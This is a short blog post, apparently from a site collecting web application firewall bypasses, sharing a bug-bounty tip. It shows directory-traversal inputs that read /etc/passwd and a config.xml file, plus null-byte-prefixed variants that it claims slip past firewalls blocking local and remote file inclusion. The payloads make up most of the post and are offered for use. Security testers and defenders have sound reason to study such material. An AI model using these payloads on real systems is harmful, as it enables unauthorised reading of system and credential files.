WAF bypass by infosec_scarlet

Date: December 21, 2020Author: wafbypass

Just discovered a weird but 100% working #WAF #Bypass – When RFI/LFI are blocked

Don’t works.
path=../../../etc/passwd
file=config.xml

Works.
path=%00../../../etc/passwd
file=%00config.xml

This works successfully. Quite a new direction for WAF bypassing. #bugbounty #Infosec

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools